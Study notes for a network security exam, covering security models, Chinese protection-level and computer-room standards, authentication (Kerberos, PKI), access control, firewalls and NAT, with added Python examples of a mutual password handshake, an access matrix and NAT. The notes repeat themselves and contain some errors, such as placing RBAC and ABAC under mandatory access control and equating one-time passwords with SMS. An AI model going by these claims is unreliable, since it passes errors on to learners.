SSE-CMM (Systems Security Engineering Capability Maturity Model) is a system security engineering capability maturity model. SSE-CMM includes Engineering, Organization, and Project.

SDLC information system security development life cycle: proposed by Microsoft.
Training, requirements, design, implementation, validation, release, response

SDLC provides three security measures that can be taken during the implementation phase of the development model:
Use approved tools: write secure code
Disable unsafe functions: ban hazardous functions in the C language
Static analysis: detect the integrity of program pointers

6. Network defense in depth model:
4 lines of defense in depth: protection, monitoring, response, and recovery. It has the same meaning as the PDRR model.
Defense in depth: at present, the security industry believes that the network needs to establish four lines of defense:
security protection is the first line of defense of the network, which can prevent intrusions into and harm to the network;
security monitoring is the second line of defense of the network, which can detect intrusions and damage in a timely manner;
real-time response is the third line of defense of the network, keeping the network from being brought down when an attack occurs;
recovery is the fourth line of defense of the network, enabling the network to "come back to life" as quickly as possible after being attacked, minimizing the losses caused by security incidents.

7. Layered protection model:
physical layer-network layer-system layer-application layer-user layer-management layer

8. Level protection model:
9. Network security system framework
10. Level protection work mainly includes: rating, filing, construction and rectification, level evaluation, and operation and maintenance.

11. Five levels of network security protection:
user autonomous protection level (isolating users and data, ACL)
system audit protection level (fine-grained discretionary access control, auditing)
security label protection level (mandatory access control)
structured protection level (considering covert channels)
access verification protection level (recoverable)

3-7 years for illegal intrusion. More than 5 years for destruction.
Cybersecurity Law: Implemented on June 1, 2017, passed by the Standing Committee of the National People's Congress on November 7, 2016.
Selling citizens' information: penalty of 10 times the illegal income.

12. What are the changes in MPS 2.0:
an expanded scope of objects, a proposed triple protection system architecture, and strengthened requirements for the use of trusted computing technology.
The main changes in Cybersecurity Level Protection 2.0 include: First, the scope of objects has been expanded to
include cloud computing, mobile Internet, Internet of Things, industrial control systems, etc. in the scope of the standard, constituting the content of "general requirements for network security + extended network security requirements for new applications". The second is to propose a
triple protection system architecture supported by "secure communication network", "security area boundary", "secure computing environment" and "security management center". Third, the new level protection 2.0 standard strengthens the requirements for the use of trusted computing technology, and adds "trusted verification" control points at all levels.
Among them, the first level requires trusted verification of the device's system boot program, system programs, etc.;
the second level adds trusted verification of important configuration parameters and applications, with the verification results formed into audit records and sent to the security management center;
the third level adds dynamic trusted verification of the key execution links of applications;
the fourth level adds dynamic trusted verification of all execution links of applications.
All levels

13. NIST cybersecurity framework system:
identify, protect, monitor, respond, and recover.

14. ISO 27001 four basic steps:
planning and preparation of the security management system,
preparation of the security management system documents,
operation of the security management system,
audit and review of the security management system.
ISO security architecture diagram.
The network security organizational structure mainly includes the leadership layer, the management layer, the execution layer, and the external collaboration layer.

The main contents of network security construction:
1. Formulation and implementation of network security strategies and standards and specifications
2. Establishment of network security organization and management agencies and staffing of positions
3. Network security project planning, design and implementation
4. Network security plan design and deployment
5. Network security engineering project acceptance evaluation and delivery

Generally speaking, the work related to network security strategy is mainly as follows:
• Investigate the needs of network security strategy and clarify its scope;
• Analyze the impact of network security strategy implementation;
• Obtain support from superior leaders for network security strategy work;
• Develop a draft network security strategy;
• Solicit opinions on network security strategy;
• Assessment of the network security strategy by risk bearers;
• Approval of network security strategy by superior leaders;
• Release of network security strategy;
• Evaluation and revision of network security strategy effectiveness.

In the network information systems of general enterprises and institutions, network security strategies mainly fall into eight categories: network asset classification strategies, password management strategies, Internet usage security strategies, network communication security strategies, remote access strategies, desktop security strategies, server security strategies, and application security strategies. Network security strategies are usually expressed through rules and regulations, operating procedures and technical specifications.

9. Sustainable operation of network systems
The management goal of sustainable operation of network systems is to prevent interruption of network business activities and ensure that important business processes are not affected by major failures and disasters. The requirements are to:
• Implement business continuity management procedures that combine prevention and recovery controls, reducing the impact of disasters and security failures caused by natural disasters, accidents, equipment failures and deliberate sabotage to an acceptable level;
• Analyze the consequences of disasters, security failures and service losses, and formulate and implement contingency plans to ensure that business processes can be restored within the required time;
• Adopt security control measures to identify and reduce risks, limit the consequences of disruptive events, and ensure timely recovery of important operations.
The work related to the sustainable operation of network systems mainly includes:
• Network operations continuity management procedures and network operation systems;
• Network operations continuity and impact analysis;
• Network operations continuity emergency plans;
• Inspection, maintenance and re-analysis of network operations continuity plans;
• Network operational status monitoring.

5. Physical security:
Physical security in a broad sense refers to the security of cyber-physical systems that integrate humans, machines, and things, consisting of hardware, software, operators, and the environment.

New hardware threats are more covert and harmful, and the attacks are proactive and non-proximate: hardware Trojans; hardware-coordinated malicious code (Cloaker); exploits of hardware security vulnerabilities (Meltdown and Spectre); attacks on hardware entities based on software vulnerabilities (the "Stuxnet" virus); and attacks on computer entities based on the environment.

The security protection of network communication lines adopts security measures from two aspects:
first, network communication equipment;
second, network communication lines. For important core network equipment, such as routers and switches, in order to prevent single-point security failures in these core equipment, equipment redundancy is generally adopted, that is, the equipment backs up each other.
The security measures for network communication lines also adopt the method of multi-channel communication. For example, the network connection can be through DDN dedicated lines and telephone lines.

1. Physical security threats:
Hardware Trojans: malicious circuits are implanted in the chip to control the hardware.
Hardware-coordinated malicious code: malicious hardware allows unprivileged users to access privileged memory areas.
Exploiting hardware security vulnerabilities: using side channels to obtain information about how CPU instructions affect the cache.
Attacking hardware based on software: using software vulnerabilities in the control system to control the parameters of physical entities.

2. Physical security protection:
There are four parts of the smart card operating system: communication management module, security management module, application management module, and file management module.

Environmental physical security, equipment physical security, system physical security

3. Data center design specification:
GB50174-2017

Internet data center engineering technical specifications:
GB51195-2016

4. Computer room protection:
waterproof, fire-proof, lightning-proof, rodent-proof, shock-proof, anti-theft, anti-electromagnetic and anti-static.

Computer room physical security threats:
Man-made: theft, destruction, explosion, hardware attack
Natural disasters: earthquake, flood, fire, lightning, rodent infestation.

5. General specification for computer sites, GB/T 2887-2011
Computer rooms are divided into three levels: A, B and C.
Level A: causes serious damage to the country and to social order.
Level B: causes great damage to the country and to social order.
Level C: basic computer room requirements.

According to the "Computer Site Security Requirements (GB/T 9361-2011)", the security level of computer rooms is divided into three basic levels: A, B, and C. The characteristics of each level are introduced below:
• Level A: After the operation of the computer system is interrupted, it will cause serious damage to national security, social order, and public interests; there are strict requirements for the safety of computer rooms and complete computer room security measures.
• Level B: After the operation of the computer system is interrupted, it will cause great damage to national security, social order, and public interests; there are stricter requirements for the safety of computer rooms and relatively complete computer room security measures.
• Level C: A situation that does not belong to Level A or B; there are basic requirements for the safety of the computer room and basic computer room security measures.
Depending on the size and purpose of the computer system, computer room security can be implemented at one level or as a combination of levels. Combined implementation means that different aspects of the computer room follow different levels. For example, a computer room can choose according to its safety requirements: electromagnetic interference at level A, fire alarm and fire extinguishing at level C.

Under GB/T 2887-2011, the computer room can comprise the following rooms (one room may serve multiple purposes, and rooms may be added or removed as appropriate):
(1) Main work rooms: main computer room, terminal room, etc.;
(2) First type of auxiliary room: low-voltage power distribution room, uninterruptible power supply room, battery room, air-conditioning room, generator room, gas cylinder room, monitoring room, etc.;
(3) Second type of auxiliary room: data room, maintenance room, technician office;
(4) Third type of auxiliary room: storage room, buffer room, technician lounge, laundry room, etc.

6. Computer rooms with more than 10,000 racks are ultra-large, those with between 3,000 and 10,000 racks are large, and those with fewer than 3,000 racks are small and medium-sized.

7. The Internet IDC computer room is divided into three levels: R1, R2 and R3:
R1: the main parts have certain redundancy capabilities, and business availability is not less than 99.5%.
R2: infrastructure and network systems have certain redundancy capabilities, and business availability is not less than 99.9%.
R3: has certain fault tolerance, and business availability is not less than 99.99%.

The physical security of the CA computer room is an important guarantee for the security of the certification agency's facilities. The State Cryptography Administration issued the "Business Rules Specification for E-Government Electronic Authentication Services", which puts forward normative requirements for the physical security of the CA computer room.
(1) The physical environment shall be strictly implemented in accordance with the requirements of GM/T 0034, with relevant measures such as shielding, fire protection, physical access control, intrusion detection and alarm, etc., and shielded room testing shall be conducted at least once every five years.
(2) All personnel in the CA computer room and office space should wear identification badges. The physical permissions of personnel entering and exiting the CA computer room should be approved by the security management personnel in accordance with the security policy.
(3) Records should be kept of all persons entering and exiting the CA computer room, and the entry and exit records of each area (such as surveillance system video tapes, access control records, etc.) should be properly and safely kept and managed. Only after confirming that these records no longer serve any security purpose may they be destroyed in a dedicated manner.
(4) Establish and implement personnel visiting systems and procedures, and supervise and monitor visiting personnel. Security personnel regularly conduct internal reviews and updates of access rights to CA facilities, and promptly follow up on violations of access to the physical areas of CA facilities.
(5) Take effective measures to protect equipment from power failure or abnormal network communication.
(6) Before disposing of or reusing devices containing storage media (such as hard drives), check whether they contain sensitive data; sensitive data should be physically destroyed or securely overwritten.
(7) Develop relevant security inspection and supervision strategies, including but not limited to requirements for the preservation of internal sensitive or key business information, protection requirements for office computers, protection requirements for CA property, etc.

8. What are the threats to network communication lines:
line electromagnetic interference,
line leakage of information,
line cutoff

Security protection measures for communication lines:
core equipment must be redundant
and lines must adopt multi-channel communication methods.

9. Storage media protection:
storage data encryption,
data disaster recovery and backup,
and enhanced storage security management.

Dual-machine hot backup is a form of hardware backup;

Fault-tolerant and disaster-tolerant storage technology: disk array, dual-machine online backup, offline backup

10. Hardware protection:
Hardware Trojan detection: reverse analysis method, power consumption analysis method, side channel analysis method.

6. Authentication
The authentication mechanism consists of a verification object, an authentication protocol, and an authentication entity.
The verification object is the entity that needs to be authenticated (the claimant);
the authentication protocol is the set of rules for exchanging authentication information between the verification object and the authentication entity (the verifier);
the authentication entity judges the authenticity or attributes of the identity based on the authentication basis provided by the verification object.

Authentication generally consists of two parts: identification and authentication.
Identification is an identity mark used to represent entity objects (such as personnel, equipment, data, services, applications) to ensure the uniqueness and recognizability of the entity; it is also strongly associated with the entity. Identification generally uses passwords, electronic signatures, and digital certificates.
Authentication is the process of identifying and verifying the attributes claimed by an entity through digital credentials such as tokens, biometrics, and behavioral performance.

Authentication basis, also known as authentication information, usually refers to the credentials used to confirm the authenticity of the identity of the entity (claimant) or the attributes it possesses. At present, the common authentication bases mainly include the following.

  1. Secret information known (Something You Know)
    Secret information held by the entity (claimant), such as user passwords, verification codes, etc.
  2. Physical credentials (Something You Have)
    Unforgeable physical devices held by the entity (claimant), such as smart cards, USB keys, etc.
  3. Biometric features
    Biometric features possessed by the entity (claimant), such as fingerprints, voice, iris, face, etc.
  4. Behavioral characteristics
    Behavioral characteristics displayed by the entity (claimant), such as mouse usage habits, keyboard keystroke intensity, geographical location, etc.

The types of router neighbor authentication include OSPF authentication, RIP authentication and EIGRP authentication. Authentication modes include plaintext authentication (Plaintext Authentication) and message digest authentication (Message Digest Authentication).

The identification factors used in continuous authentication are mainly cognitive factors, physiological factors, and contextual factors. Cognitive factors mainly include eye-hand coordination, application behavior patterns, usage preferences, device interaction patterns, etc. Physiological factors include left/right hand, press size, hand tremor, arm size and muscle use. Contextual factors mainly include transaction, navigation, device and network patterns. For example, some websites determine the identity of the visitor based on address location information to confirm whether access is authorized.

Anti-tampering message authentication technology

The difference between authentication and encryption:
Encryption is used to ensure the confidentiality of data and prevent interception and eavesdropping.
Authentication ensures the authenticity of both the sender and the receiver and the integrity of the message, preventing attacks such as impersonation and tampering.

The difference between authentication and digital signature:
Authentication is based on confidential data shared by the sender and receiver to establish the authenticity of the object. The sender and receiver verify each other's authenticity, and a third party cannot verify it. Authentication does not necessarily provide the ability that the sender cannot repudiate and the receiver cannot forge.
The data of digital signatures is public, and digital signatures allow both parties and third parties to authenticate. Digital signatures have the ability that the sender cannot deny it and the recipient cannot forge it.

The difference between digital signatures and digital certificates: digital certificates are issued by a CA (Certificate Authority), an authoritative organization. A certificate is an authoritative electronic document for identity verification on the Internet; people can use it to prove their own identity and identify the other party in Internet interactions. A digital signature (also known as a public key digital signature or electronic signature) is similar to an ordinary physical signature written on paper, but it is implemented using public key cryptography and is used to authenticate digital information. A digital signature scheme usually defines two complementary operations, one for signing and another for verification.

Identity authentication includes the following:
1. Password authentication
1) Use one-way function to encrypt passwords: User passwords are stored in cipher text and can only be encrypted but not decrypted.
2) Use digital signature method to verify passwords: Using a public key storage system can resist replay attacks.
3) Two-way authentication of passwords: Both the sender and the receiver verify each other's identity.
4) One-time password: A password can only be used once and can resist replay attacks.

2. Biometric authentication:
fingerprint, palm print, face, voice, iris, retina, skeleton.

3. Message authentication includes:
message source authentication,
message sink authentication, and
message content authentication: including message confidentiality, message source authentication, and message authentication.

1. Authentication consists of two parts: identification and authentication.
The credentials for identification include: the secret information known, the credentials possessed, individual characteristics, and the behavior exhibited.

The difference between authentication and encryption is that
encryption is used to ensure the confidentiality of data and prevent passive attacks, such as interception and eavesdropping, while authentication is used to ensure the authenticity of the sender and receiver of the message and the integrity of the message.

2. Authentication is divided into: single-factor authentication, two-factor authentication, and multi-factor authentication. The other ones are: one-way authentication, two-way authentication, and third-party authentication.

3. One-time authentication is called OTP authentication, which is SMS authentication.
Continuous authentication is most secure: cognitive factors (behavioral preferences), physical factors (left and right hands, muscles), contextual factors (navigation, network patterns).
Continuous authentication prevents counterfeiting, phishing, man-in-the-middle attacks, identity theft, and social engineering.

A smart card is an integrated circuit card with memory and a microprocessor that can securely store authentication information and has certain computing capabilities. Smart card authentication is based on the physical objects owned by the user, and smart card authentication technology is widely used in all aspects of society.

4. Authentication technology methods mainly include: password authentication, smart card authentication, biometric authentication, and Kerberos authentication.
One-way authentication:
Two-way authentication:

The two parties agree in advance and share each other's passwords.
Assume that user A's password is PA and system B's password is PB.
Use a one-way function f to realize two-way peer-to-peer verification of passwords:
1) A→B: RA, where RA is a random number chosen by A
2) B→A: f(PB||RA)||RB
3) After A receives the message, it uses the one-way function to calculate f(PB||RA). If the result equals what it received, then B is genuine.
4) A→B: f(PA||RB). B also uses the one-way function to calculate f(PA||RB). If the result equals what it received, then A is genuine.
To prevent replay attacks, time parameters can be added to f(PA||RB) and f(PB||RA).
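The four-step exchange above, written out as an added example (not part of the original notes). SHA-256 stands in for the one-way function f, and the `Peer` class, the 30-second freshness window and the sample passwords are assumptions made for the illustration.

```python
import hashlib
import hmac
import secrets
import time

MAX_SKEW = 30  # seconds a proof stays acceptable (assumed value, not from the notes)


def f(password: bytes, nonce: bytes, ts: int) -> bytes:
    """One-way function f(P || R) with the time parameter mixed in.

    SHA-256 stands in for f (an assumption). Each field is length-prefixed so
    that different (P, R) pairs can never produce the same byte string.
    """
    h = hashlib.sha256()
    for field in (password, nonce, ts.to_bytes(8, "big")):
        h.update(len(field).to_bytes(4, "big") + field)
    return h.digest()


class Peer:
    """One side of the exchange; both sides hold both pre-shared passwords."""

    def __init__(self, own_pw: bytes, peer_pw: bytes):
        self.own_pw = own_pw
        self.peer_pw = peer_pw
        self.nonce = None  # challenge currently outstanding, if any

    def challenge(self) -> bytes:
        """Issue a fresh random number (RA or RB)."""
        self.nonce = secrets.token_bytes(16)
        return self.nonce

    def prove(self, peer_nonce: bytes, now: int):
        """Answer the peer's challenge: f(own password || peer nonce), plus ts."""
        return f(self.own_pw, peer_nonce, now), now

    def verify(self, proof: bytes, ts: int, now: int) -> bool:
        """Recompute f with the peer's password and our own outstanding nonce."""
        nonce, self.nonce = self.nonce, None  # a challenge is single-use
        if nonce is None or abs(now - ts) > MAX_SKEW:
            return False
        return hmac.compare_digest(proof, f(self.peer_pw, nonce, ts))


def run_handshake(a: Peer, b: Peer, now: int) -> bool:
    ra = a.challenge()                    # 1) A -> B: RA
    rb = b.challenge()
    proof_b, ts_b = b.prove(ra, now)      # 2) B -> A: f(PB || RA) || RB
    if not a.verify(proof_b, ts_b, now):  # 3) A checks B
        return False
    proof_a, ts_a = a.prove(rb, now)      # 4) A -> B: f(PA || RB)
    return b.verify(proof_a, ts_a, now)   #    B checks A


def replay_is_rejected(a: Peer, b: Peer, now: int) -> bool:
    """Capture A's proof in one session, replay it against B's next challenge."""
    rb_old = b.challenge()
    captured, ts = a.prove(rb_old, now)
    assert b.verify(captured, ts, now)    # the original session succeeds
    b.challenge()                         # new session, new RB
    return not b.verify(captured, ts, now)


if __name__ == "__main__":
    # Constructed passwords for the demo.
    A = Peer(b"PA-constructed", b"PB-constructed")
    B = Peer(b"PB-constructed", b"PA-constructed")
    t = int(time.time())
    print("mutual authentication:", run_handshake(A, B, t))
    print("replay rejected:", replay_is_rejected(A, B, t))
```

The random numbers defeat replay across sessions, and the time parameter bounds how long a captured proof for a still-open challenge remains usable.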

Password authentication is vulnerable to attacks: mainly man-in-the-middle, replay, eavesdropping, and guessing.
Password security must meet the following requirements: passwords must be encrypted and stored, passwords must be transmitted securely, passwords cannot be repudiated, and weak passwords must be avoided.
Password authentication process:

Kerberos is a network authentication protocol that uses a client/server (C/S) structure, symmetric cryptography, and a trusted third party to provide strong identity authentication services. It mainly provides single sign-on: the client authenticates only once and can then access multiple servers.

Kerberos four entities:
Kerberos client: the client used to access the server
AS (authentication server): identifies identity and provides TGS
TGS (ticket granting server): provides users with credentials
Application server: a device or system that provides services to users

Among them, AS and TGS are usually collectively called the KDC (Key Distribution Center). A ticket is a collection of information required to securely transmit a user's identity, mainly including the client's Principal, the destination server's Principal, the client's IP address, a timestamp (the time when the ticket was distributed), the lifetime of the ticket, and the session key. The Kerberos V5 authentication protocol mainly consists of six steps, as shown in Figure 6-13.
The Kerberos protocol requires users to go through two stages of authentication, with the AS and with the TGS. This has two main advantages.
(1) It can significantly reduce the number of times ciphertext produced with the user key is exposed, thus reducing the attacker's accumulation of ciphertext related to the user key.
(2) The Kerberos authentication process has the advantage of Single Sign On (SSO). As long as the user has obtained the TGT and the TGT has not expired, the user can use the TGT to complete the authentication process to any server through the TGS without having to re-enter the password.
However, Kerberos also has shortcomings. The Kerberos authentication system requires solving host node time synchronization issues and resisting denial of service attacks. If the time of a certain host is changed, the host cannot use the Kerberos authentication protocol. If the server's time is incorrect, the entire Kerberos authentication system will be paralyzed. Although Kerberos V5 has its shortcomings, it is still a relatively good security authentication protocol. Currently, both Windows systems and Hadoop support Kerberos authentication.


PKI public key infrastructure system:
A public key cryptosystem can not only implement encryption services but also provide identification and authentication services. Besides confidentiality, the trusted distribution of public keys is also a problem it faces, that is, the authenticity and ownership of the public key. To solve this problem, people use the "public key certificate", similar to ID cards and passports. A public key certificate binds an entity to a public key and allows other entities to verify the binding relationship. For this purpose, a trusted third party is needed to vouch for the identity of the entity. This third party is called a certification authority, or CA (Certification Authority) for short. The CA is responsible for issuing certificates, which contain the entity name, public key, and other identity information of the entity. PKI (Public Key Infrastructure) is a security service facility comprising the hardware, software, personnel, policies and processes required to create, manage, store, distribute and revoke public key certificates. PKI provides a systematic, scalable, unified, and easily controlled public key distribution method. The main security services based on PKI include identity authentication, integrity protection, digital signature, session encryption management, and key recovery. Generally speaking, PKI involves negotiation and operations between multiple entities. The main entities include the CA, RA, end entity (End Entity), client, and directory server, as shown in Figure 6-19.
PKI security service functions: identity authentication, integrity protection, digital signature, session encryption, key recovery.

The functions of each PKI entity are described as follows:
CA (Certification Authority): certificate authority, mainly responsible for issuing, revoking and renewing certificates; a certification authority is responsible for issuing, managing and revoking certificates for a group of end users.
RA (Registration Authority): certificate registration authority, which links the public key with the identity and other attributes of the corresponding certificate holder for registration and guarantee; the RA can act as an intermediary, assisting the CA in completing most other certificate processing functions.
Directory server: CAs typically use a directory server to provide certificate management and distribution services.
End Entity: refers to objects that require authentication, such as servers, printers, email addresses, users, etc.
Client: refers to users who need PKI-based security services, including users, service processes, etc.

5. Public key cryptography PKI entities include:
CA: certificate issuance, management, revocation, and update.
RA: certificate registration authority, used to assist the certificate processing function between the CA and the client.
End entity: the object that requires authentication.
Client: user who needs PKI-based services.
Directory server.

There is no CA's public key on the certificate, only the holder's public key.

CA issuance process:
The user submits the RA-approved registration information and his or her identity information to the CA.
The CA verifies the correctness and authenticity of the submitted information.
The CA generates a key for the user and makes a backup.
The CA generates a certificate and applies a signature.
A copy of the certificate is handed over to the user and archived in the database.

Key management for symmetric ciphers:

6. Fast Online Authentication (FIDO):
Fast IDentity Online, also known as FIDO, uses standard public key encryption technology to provide strong authentication, using fingerprint, face, and voice authentication. FIDO's design goal is to protect user privacy: it does not provide information that could be used to track users, and user biometric information does not leave the user's device.

7. The main product types of authentication technology include 5 types:
System security enhancement: USB drive plus password (dongle)
Biometric authentication: face recognition
Electronic authentication service: PKI and SSL
Network access control: 802.1X, Portal and MAC authentication for terminal access
Identity authentication gateway: digital certificate, single sign-on.

8. eID citizen network electronic identity is an important guarantee for the national network, mainly using asymmetric keys and digital certificates.
eID authentication involves the eID service platform, application service providers and users holding eIDs.

9. Evaluation indicators for certified products:
safety functional requirements, safety performance requirements, and safety assurance requirements.

10. Components of the authentication mechanism:
verification object, authentication protocol, and identification entity.
Authentication: Authenticate the sender and receiver and check the integrity of the message.
BAA is used for web access authentication: the web page automatically pops up an authentication prompt in which the user name and password are entered.

7. Main elements of access control model:

Subject: the operator that acts on the object.
Object: what the subject operates on.
Reference monitor: monitors the operations between subjects and objects and stores the information in the audit library.
Access control database: stores access policy information between subjects and objects.
Audit library: stores information about the success or failure of subjects accessing objects.

Three access control implementation methods:
Capability table:
(subject) Administrator<(object) traceroute.mpg: read, run>

Access Control List:
(Object) traceroute.mpg <(Subject) Administrator: Read, Run>

Access control matrix

Types of access control:
Discretionary access control:
1. Row-based discretionary access control (capability table, prefix table, password)
2. Column-based discretionary access control (protection bit rwx, access control list)

Only the access control list puts the file in the left column, with users and their permissions on the right:
file ------> admin: r,w

In both the capability table and the matrix, the positions of files and user names are swapped.
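The three implementation methods and the model elements above can be tied together in one added example (not part of the original notes): a constructed access control matrix is projected into its row view (capability table) and column view (ACL), and a small reference monitor answers requests from the ACL while recording each decision in the audit library. The users `alice` and `bob` and the file `audit.log` are made-up sample data.

```python
from collections import defaultdict

# Constructed access control matrix: rows are subjects, columns are objects.
MATRIX = {
    "Administrator": {"traceroute.mpg": {"read", "run"}, "audit.log": {"read", "write"}},
    "alice": {"traceroute.mpg": {"read"}, "audit.log": set()},
    "bob": {},
}


def capability_table(matrix):
    """Row-based view: each subject carries the list of objects it may access."""
    table = {}
    for subject, row in matrix.items():
        caps = {obj: frozenset(rights) for obj, rights in row.items() if rights}
        if caps:
            table[subject] = caps
    return table


def access_control_lists(matrix):
    """Column-based view: each object carries the list of subjects allowed."""
    acls = defaultdict(dict)
    for subject, row in matrix.items():
        for obj, rights in row.items():
            if rights:
                acls[obj][subject] = frozenset(rights)
    return dict(acls)


def format_entry(left, entries):
    """Render one row or column in the notes' `left <right: rights>` form."""
    inner = "; ".join(
        f"{name}: {', '.join(sorted(rights))}" for name, rights in sorted(entries.items())
    )
    return f"{left} <{inner}>"


def subjects_with(right, obj, caps):
    """'Who can touch this object?' asked of capabilities scans every subject;
    with an ACL the same question is a single lookup on the object."""
    return sorted(s for s, c in caps.items() if right in c.get(obj, ()))


class ReferenceMonitor:
    """Mediates every request against the access control database and
    records success or failure in the audit library."""

    def __init__(self, matrix):
        self.database = access_control_lists(matrix)
        self.audit = []

    def request(self, subject, obj, right):
        allowed = right in self.database.get(obj, {}).get(subject, frozenset())
        self.audit.append((subject, obj, right, "success" if allowed else "failure"))
        return allowed


if __name__ == "__main__":
    caps, acls = capability_table(MATRIX), access_control_lists(MATRIX)
    print(format_entry("Administrator", caps["Administrator"]))
    print(format_entry("traceroute.mpg", acls["traceroute.mpg"]))
    rm = ReferenceMonitor(MATRIX)
    print(rm.request("alice", "traceroute.mpg", "run"), rm.audit[-1])
```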

Mandatory access control:
role-based access control RBAC
attribute-based access control ABAC


2. Discretionary access control means that the owner of an object grants access to it at the owner's own discretion.
Discretionary access control is divided into two categories: row-based and column-based.
Row-based: capability tables (read, write, execute), prefix tables, passwords. A list of accessible objects is attached to each subject.

Column-based: protection bits (rwx bits represent access permissions, as in Linux), access control lists (ACL). A list of subjects that can access it is attached to each object.

3. Four elements of role-based access control (RBAC), used in Windows and Solaris systems:
user, role, session, permission. There can be multiple users and multiple roles in a system.

4. The access control process generally has five steps:
clarify the assets to be controlled and managed,
analyze the security requirements of the assets to be managed,
formulate access control strategies,
implement access control strategies,
and operate and maintain the strategies.

5. Password principles:
Passwords must be more than 8 characters long and use uppercase and lowercase letters plus numbers and special characters.
Accounts and passwords cannot be the same.
Weak passwords cannot be used.
Sharing of accounts and passwords is prohibited.
Passwords must be changed every once in a while.
Password files must have advanced access permissions.
The number of account login errors is generally limited to 3.

6. Types of access control:
4A: authentication, authorization, account, audit; commonly uses role-based methods to control authorization management
Security gateway: such as firewalls and UTM devices
System security enhancement: operating system and database hardening products, SELinux

The log file is a special file in the Windows system. It records the running status of the Windows system, such as the startup, operation, shutdown and other information of various system services. There are three types of Windows logs: system logs, application logs and security logs, and their corresponding file names are SysEvent.evt, AppEvent.evt and SecEvent.evt. These log files are usually stored in the "system32\config" directory of the operating system installation area.

Access control rules:
Access control rules based on user identity - account and password
Role-based access control rules - role permissions
Address-based access control rules - IP, domain name, physical address
Time-based access control rules - off-duty hours
Access control rules based on abnormal events - 3 failed logins, freezing
Access control rules based on the number of services - a certain threshold of service capabilities

Passwords are an important basis for most current network implementations of access control and identity authentication. Therefore, password management is particularly important and generally adheres to the following principles:
• Passwords should be at least 8 characters long and combine uppercase and lowercase letters, numbers, and special characters;
• It is forbidden to use the same password as the account;
• Change the system default password to avoid using the default password;
• Limit the number of account login attempts; 3 is recommended;
• It is forbidden to share accounts and passwords;
• Password files should be stored encrypted and be readable only by the superuser;
• It is forbidden to transmit passwords in clear text on the network;
• Passwords should have an aging mechanism to ensure they are changed frequently, and reuse of passwords is prohibited;
• Run password cracking tools on all accounts to check for accounts with weak passwords or no password.

8 (Key points). There are two types of firewall strategies: whitelist and blacklist.

Firewall matching operations include: deny, forward, audit

Firewall functions:
filter non-secure network access;
restrict network access;
network access audit;
network bandwidth control;
collaborative defense.
According to the TCP/IP protocol level, the firewall's access control can act on the network interface layer, network layer, transport layer, and application layer.

Several areas of the firewall:
• Public external networks, such as the Internet;
• Intranet, such as a private network of a company or organization, where network access is restricted to within the organization;
• Extranet, an extension of the intranet, commonly used for communication between organizations and partners;
• Military buffer zone, DMZ for short: a network segment between the internal network and the external network, where public service equipment is often placed to provide information services to the outside world.

Firewall performance indicators mainly include the following aspects:
• Maximum throughput
• Maximum connection rate
• Maximum number of rules
• Number of concurrent connections

Three types of firewall architectures:
Dual-homed host architecture: a dual-homed host serves as the main body of the firewall system. It uses 2 network cards, one connected to the external network and one connected to the internal network, to separate the external and internal networks, and can perform control and filtering functions.

Proxy firewall architecture: It consists of two devices: a proxy server host and a filtering router. The proxy server not only acts as a proxy for internal and external network communications, but also connects to the egress filtering router to jointly build a secure network boundary.

Screened subnet architecture: it adds a layer of perimeter network security to the proxy firewall architecture, so that there are two layers of isolation between the internal network and the external network.


Functions of the firewall: filtering non-secure network access, restricting network access, network access auditing, network bandwidth control, collaborative defense, server load balancing, NAT

2. What are the security risks of firewalls?
Network bypass
Firewall functional defects:
It cannot completely prevent virus-infected software or files.
Unable to protect against data-driven attacks.
Unable to completely prevent backdoor attacks.
Unable to protect against internal threats.
Limited by security rules.

3. The packet filtering firewall is highly efficient, cannot filter at the user level, and cannot identify anti-phishing IPs.

4. Firewall deployment method:
Divide different security zones according to business,
set access points for different security zones,
formulate access policies for access between different zones,
adopt appropriate firewall technology according to the border access policy,
configure and implement the corresponding security policy,
test whether the border policy works normally,
and operate and maintain the firewalls.

NAT:
There are three main ways to implement network address translation: static NAT (Static NAT), NAT pool (pooled NAT) and port NAT (PAT). Static NAT is the simplest to set up: each host in the internal network is permanently mapped to a legal address in the external network. A NAT pool configures a set of legal addresses in the external network and maps them to internal hosts by dynamic allocation. PAT maps internal addresses to different ports of one IP address on the external network. Currently, many router products have NAT functions. The iptables firewall that comes with the open source operating system Linux supports address translation.
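The three translation methods side by side, as an added example that is not part of the original notes. The class names, port range and addresses are assumptions made for illustration (internal hosts use RFC 1918 addresses, external addresses come from the 203.0.113.0/24 documentation range).

```python
class StaticNAT:
    """Static NAT: every internal host is permanently mapped to one external address."""

    def __init__(self, mapping):
        self.mapping = dict(mapping)

    def translate(self, src_ip, src_port):
        return self.mapping[src_ip], src_port      # KeyError: host has no mapping


class PooledNAT:
    """NAT pool: external addresses are handed out dynamically, one per internal host."""

    def __init__(self, pool):
        self.free = list(pool)
        self.leases = {}

    def translate(self, src_ip, src_port):
        if src_ip not in self.leases:
            if not self.free:
                raise RuntimeError("NAT pool exhausted")
            self.leases[src_ip] = self.free.pop(0)
        return self.leases[src_ip], src_port

    def release(self, src_ip):
        self.free.append(self.leases.pop(src_ip))


class PAT:
    """Port NAT: all internal (address, port) pairs share one external address
    and are told apart by the external port allocated to them."""

    def __init__(self, external_ip, first_port=20000, last_port=20999):
        self.external_ip = external_ip
        self.ports = iter(range(first_port, last_port + 1))
        self.outbound = {}    # (internal ip, internal port) -> external port
        self.inbound = {}     # external port -> (internal ip, internal port)

    def translate(self, src_ip, src_port):
        key = (src_ip, src_port)
        if key not in self.outbound:
            port = next(self.ports, None)
            if port is None:
                raise RuntimeError("no free external ports")
            self.outbound[key] = port
            self.inbound[port] = key
        return self.external_ip, self.outbound[key]

    def reverse(self, ext_port):
        """Map a reply back to the internal socket; None means no session exists."""
        return self.inbound.get(ext_port)


# Constructed flows: (internal address, source port).
FLOWS = [("192.168.0.10", 51000), ("192.168.0.11", 51000), ("192.168.0.12", 40222)]


def run_demo():
    static = StaticNAT({"192.168.0.10": "203.0.113.10"})
    pool = PooledNAT(["203.0.113.20", "203.0.113.21"])   # two addresses, three hosts
    pat = PAT("203.0.113.30")
    result = {"static": static.translate(*FLOWS[0]), "pool": [], "pat": []}
    for flow in FLOWS:
        try:
            result["pool"].append(pool.translate(*flow))
        except RuntimeError as exc:
            result["pool"].append(str(exc))
        result["pat"].append(pat.translate(*flow))
    result["reply_to_20001"] = pat.reverse(20001)        # return traffic of flow 2
    result["unsolicited_20500"] = pat.reverse(20500)     # no session: dropped
    return result


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(name, value)
```

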